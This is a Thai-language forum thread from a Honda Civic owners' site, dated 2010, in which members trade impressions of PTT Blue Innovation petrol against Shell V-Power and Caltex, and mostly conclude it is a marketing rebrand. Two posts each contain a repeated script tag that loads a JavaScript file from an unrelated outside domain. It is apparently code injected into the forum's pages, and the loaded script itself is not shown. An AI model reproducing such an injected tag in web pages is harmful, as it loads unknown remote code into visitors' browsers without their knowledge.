ตอบ
silchai

ชื่อเล่น: เอ

เข้าร่วม: 02 ธันวา 2008
ตอบ: 307

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 283
ให้คำขอบคุณ: 180

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 6 ตุลา 2010 15:15 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
Yakumo พิมพ์ว่า:
ทุกตัวเป็น Blue Inno เหมือนกันหมด แสดงว่าไ่ม่ไ้ด้แบ่งว่าเป็น Main Grade หรือ Premium Grade นี้ครับ นั้นสามารถตีความว่าทั้งหมดคือ Main Grade ที่มีการปรับสูตรของ Additive ใหม่ ก็คงไม่ได้ต่างกับตอนที่บริษัทอื่นๆ ปรับสูตร น้ำมันของ Main Grade ล่ะมั้งครับ

ton_dezember พิมพ์ว่า:
ไม่มีส่วนได้ส่วนเสียกับปตท.นะครับ ตอบอย่างจริงใจ งั้นๆหละครับ

เห็นดวยครับว่า มันไม่น่าจะแตกต่างกันเท่าไหร่ เพราะแค่ปรับสูตร Main ทั่วๆไป แล้วเอามาตั้งชื่อให้ดูดีหน่อย เพื่อการตลาดแค่นั้นอะครับ ส่วนตัวผมไม่ได้เติม PTT นะครับ นอกจากขับทางไกลที่หาปั๊มยาก
เคยเติม PTT สลับกับ Caltex แล้วทดสองจับระยะทางดู ผมทำแบบนี้ประมาณ 6 รอบ ผลปรากฏว่า caltex ขับได้มากกว่า ทุกครั้งอย่างมีนัยสำคัญครับ ผมก็เลย ไม่เติม PTT เลยตั้งแต่นั้นมา
panukij

เข้าร่วม: 31 สิงหา 2010
ตอบ: 78

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 18

ที่อยู่: 70 ซ.ธรรมวิถี 3 ถ.ธรรมวิถี ต.ปากน้ำโพ อ.เมือง จ.นครสวรรค์ 60000
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 6 ตุลา 2010 16:04 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
รอข้อมูลจากผู้ใช้..ด้วย
forever1234

ชื่อเล่น: หย่อง

เข้าร่วม: 04 พฤศจิกา 2009
ตอบ: 23

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 11
ให้คำขอบคุณ: 0

ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 6 ตุลา 2010 17:05 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
จากความรู้สึกส่วนตัวนะครับ หลังจากเติม ptt blue เต็มถังมาเป็นครั้งที่2 (ก่อนหน้าใช้แต่ v-power)
1.รู้สึกว่าเวลาเติมเต็มถังน้ำหนักมันน้อยกว่าเดิมเมื่อเทียบกับ v-power
2.เสียงเครื่องเวลาเร่งเบาลง v-power เสียงมันจะแน่นๆ ptt blue เสียงเหมือนไม่มีแรงบอกไม่ถูก
3.ก็พุ่งดีครับ แฟนนั่งข้างๆบอกทำไมวันนี้ขับเร็วจังเสียว *_*
4.เหมือนจะประหยัดน้ำมันกว่า v-power, v-power จะหมดเร็วกว่า จากเต็มถัง v-power ครึ่งถังกับอีก 2-3 ขีด, ptt blue อีก 1 ขีดหมดครึ่งถัง
ปล. ระยะทางที่วิ่ง วิ่งจากเชียงไปพะเยาเลยไปอีกประมาณ80กว่าโล ไป-กลับ วิ่งเส้นลำปางครับ ความเร็วประมาณ 100-120km/hr. ในทางตรง
ทั้งหมดเป็นแค่ความรู้สึกส่วนตัวโดยประมาณนะครับผิดถูกยังไงขออภัยด้วย และถ้าอยากลองเติมดูจริงๆให้ลองเติมใช้ไปสักระยะดูก่อนครับ เพราะถ้าเติมครั้งสองครั้งหรือเติมแล้วไม่ค่อยได้วิ่งมันจะไม่เห็นผลหรอกครับเหมือน v-power นั้นแหละ ตอนนี้นอกใจ v-power มาใช้ ptt blue อยู่ครับ
a.say

เข้าร่วม: 26 กันยา 2009
ตอบ: 711

Guru ES
Guru ES

ได้รับคำขอบคุณ: 725
ให้คำขอบคุณ: 1501

ปี: 2004
พุธ, 6 ตุลา 2010 19:09 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
เห็นดวยครับว่า มันไม่น่าจะแตกต่างกันเท่าไหร่ เพราะแค่ปรับสูตร Main ทั่วๆไป แล้วเอามาตั้งชื่อให้ดูดีหน่อย เพื่อการตลาดแค่นั้นอะครับ ส่วนตัวผมไม่ได้เติม PTT นะครับ นอกจากขับทางไกลที่หาปั๊มยาก
เคยเติม PTT สลับกับ Caltex แล้วทดสองจับระยะทางดู ผมทำแบบนี้ประมาณ 6 รอบ ผลปรากฏว่า caltex ขับได้มากกว่า ทุกครั้งอย่างมีนัยสำคัญครับ ผมก็เลย ไม่เติม PTT เลยตั้งแต่นั้นมา[/quote]

+1 ก็คิดงั้นเหมือนกันน่ะครับ
ได้รับคำขอบคุณจาก: silchai 
Feudalz

เข้าร่วม: 08 มีนา 2009
ตอบ: 98

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 34

ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 6 ตุลา 2010 19:24 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
เปลี่ยนชื่อเพื่อ "การตลาด" มาแข่งกับ shell
paejung

เข้าร่วม: 18 มิถุนา 2010
ตอบ: 176

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 206
ให้คำขอบคุณ: 405

ปี: 2003
พฤหัส, 7 ตุลา 2010 07:37 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
สงสัยต้องลองดู
SIRATH BUALUANG

ชื่อเล่น: กรด

เข้าร่วม: 08 ธันวา 2009
ตอบ: 740

Guru ES
Guru ES

ได้รับคำขอบคุณ: 701
ให้คำขอบคุณ: 577

สี: แดง ไฟร์เปปเปอร์ (R-507P)
พฤหัส, 7 ตุลา 2010 11:07 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
แล้ว LPG เค้าไม่ปรับสูตรกันบ้างเรอะ...

อยากแรงขึ้นบ้างน่ะครับ

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
curran

ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

พฤหัส, 7 ตุลา 2010 22:32 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
Yakumo

ชื่อเล่น: วิณ

เข้าร่วม: 04 ตุลา 2008
ตอบ: 151

ได้รับคำขอบคุณ: 486
ให้คำขอบคุณ: 2

พฤหัส, 7 ตุลา 2010 22:33 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
silchai พิมพ์ว่า:
ทุกตัวเป็น Blue Inno เหมือนกันหมด แสดงว่าไ่ม่ไ้ด้แบ่งว่าเป็น Main Grade หรือ Premium Grade นี้ครับ นั้นสามารถตีความว่าทั้งหมดคือ Main Grade ที่มีการปรับสูตรของ Additive ใหม่ ก็คงไม่ได้ต่างกับตอนที่บริษัทอื่นๆ ปรับสูตร น้ำมันของ Main Grade ล่ะมั้งครับ

ไม่มีส่วนได้ส่วนเสียกับปตท.นะครับ ตอบอย่างจริงใจ งั้นๆหละครับ

เคยเติม PTT สลับกับ Caltex แล้วทดสองจับระยะทางดู ผมทำแบบนี้ประมาณ 6 รอบ ผลปรากฏว่า caltex ขับได้มากกว่า ทุกครั้งอย่างมีนัยสำคัญครับ ผมก็เลย ไม่เติม PTT เลยตั้งแต่นั้นมา

ชอบ comment นี้มากๆ ครับ
ได้รับคำขอบคุณจาก: silchai 
Juris

ชื่อเล่น: เม

เข้าร่วม: 01 ตุลา 2008
ตอบ: 780

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1697
ให้คำขอบคุณ: 1333

ศุกร์, 8 ตุลา 2010 03:29 - ใครลองเติม PTT Blue Innovation แล้วมั่ง

คนนี้มีส่วนได้ส่วนเสีย ศาลไม่รับฟัง คิคิ
Yakumo

ชื่อเล่น: วิณ

เข้าร่วม: 04 ตุลา 2008
ตอบ: 151

ได้รับคำขอบคุณ: 486
ให้คำขอบคุณ: 2

ศุกร์, 8 ตุลา 2010 16:22 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
Juris พิมพ์ว่า:

คนนี้มีส่วนได้ส่วนเสีย ศาลไม่รับฟัง คิคิ

ไม่รับคำร้องซะงั้น อิอิ
pimniyoum

ชื่อเล่น: เค

เข้าร่วม: 06 ธันวา 2008
ตอบ: 414

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 306
ให้คำขอบคุณ: 11

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 8 ตุลา 2010 22:49 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
ผมไม่เติมpttคับต่อให้มันปรับสูตรดีแค่ไหนก็ไม่เอา
mrbom

เข้าร่วม: 13 มิถุนา 2010
ตอบ: 27

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 14
อาทิตย์, 10 ตุลา 2010 13:25 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
forever1234 พิมพ์ว่า:
จากความรู้สึกส่วนตัวนะครับ หลังจากเติม ptt blue เต็มถังมาเป็นครั้งที่2 (ก่อนหน้าใช้แต่ v-power)
1.รู้สึกว่าเวลาเติมเต็มถังน้ำหนักมันน้อยกว่าเดิมเมื่อเทียบกับ v-power
2.เสียงเครื่องเวลาเร่งเบาลง v-power เสียงมันจะแน่นๆ ptt blue เสียงเหมือนไม่มีแรงบอกไม่ถูก
3.ก็พุ่งดีครับ แฟนนั่งข้างๆบอกทำไมวันนี้ขับเร็วจังเสียว *_*
4.เหมือนจะประหยัดน้ำมันกว่า v-power, v-power จะหมดเร็วกว่า จากเต็มถัง v-power ครึ่งถังกับอีก 2-3 ขีด, ptt blue อีก 1 ขีดหมดครึ่งถัง
ปล. ระยะทางที่วิ่ง วิ่งจากเชียงไปพะเยาเลยไปอีกประมาณ80กว่าโล ไป-กลับ วิ่งเส้นลำปางครับ ความเร็วประมาณ 100-120km/hr. ในทางตรง
ทั้งหมดเป็นแค่ความรู้สึกส่วนตัวโดยประมาณนะครับผิดถูกยังไงขออภัยด้วย และถ้าอยากลองเติมดูจริงๆให้ลองเติมใช้ไปสักระยะดูก่อนครับ เพราะถ้าเติมครั้งสองครั้งหรือเติมแล้วไม่ค่อยได้วิ่งมันจะไม่เห็นผลหรอกครับเหมือน v-power นั้นแหละ ตอนนี้นอกใจ v-power มาใช้ ptt blue อยู่ครับ

จริงอ่ะ แฟนบอกว่าขับรถเร็วเลยเหรอครับ ฮ่าๆๆ
เมื่ออาทิตย์ที่แล้วผมก็เติมไปแล้วเหมือนกัน แต่ตอนนั้นเป๋าแบนอยู่ ยังวัดอะไรไม่ได้มาก
เดี๋ยวจะจัดเต็มถังนี่แหละ แต่แค่เติมไปนิดนึงวันนั้น ก็รู้สึกว่ามันแรงขึ้นกว่าเดิมนะ
cacalot

เข้าร่วม: 31 สิงหา 2010
ตอบ: 1058

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1288
ให้คำขอบคุณ: 6066

อาทิตย์, 10 ตุลา 2010 14:54 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
ผมว่าน้ำหอย เฮ้ยไม่ช่ายน้ำมันตราหอยอ่ะเจ๋งสุดแล้วตอนนี้แต่แพงแถวบ้านผมแพงกว่า กทม อีก
nothappy

เข้าร่วม: 03 มิถุนา 2010
ตอบ: 14

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 7
อังคาร, 12 ตุลา 2010 22:33 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
patoo พิมพ์ว่า:
ลิตรเท่าไหร่ครับ อิอิ

"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">

ราคาเท่าเดิมเลยครับ แต่รู้สึกเครื่องเงียบขึ้นนะ
Kriss_es04

ชื่อเล่น: อ๊อด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1745

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1543
ให้คำขอบคุณ: 234

ที่อยู่: ดินแดง-แจ้งวัฒนะ-นนทบุรี-มหาชัย-พระราม2-กระทุ่มแบน-สามพราน
พฤหัส, 14 ตุลา 2010 13:05 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
เป็นเรื่องของการตลาดครับ
ไม่น่าแตกต่างจากเดิมมากนัก
nothappy

เข้าร่วม: 03 มิถุนา 2010
ตอบ: 14

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 7
พฤหัส, 21 ตุลา 2010 00:15 - ใครลองเติม PTT Blue Innovation แล้วมั่ง
ก็ต้องดูๆกันไปครับ ใครมีตารางเปรียบเทียบมั่งยังครับ คนที่เติมน้ำมันบ่อยๆ ผมไม่ค่อยเติมหนักๆเท่าไร เลยไม่ค่อยได้ทำตารางเปรียบเทียบเลย ว่าน้ำมันค่ายไหนแจ่มๆ
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.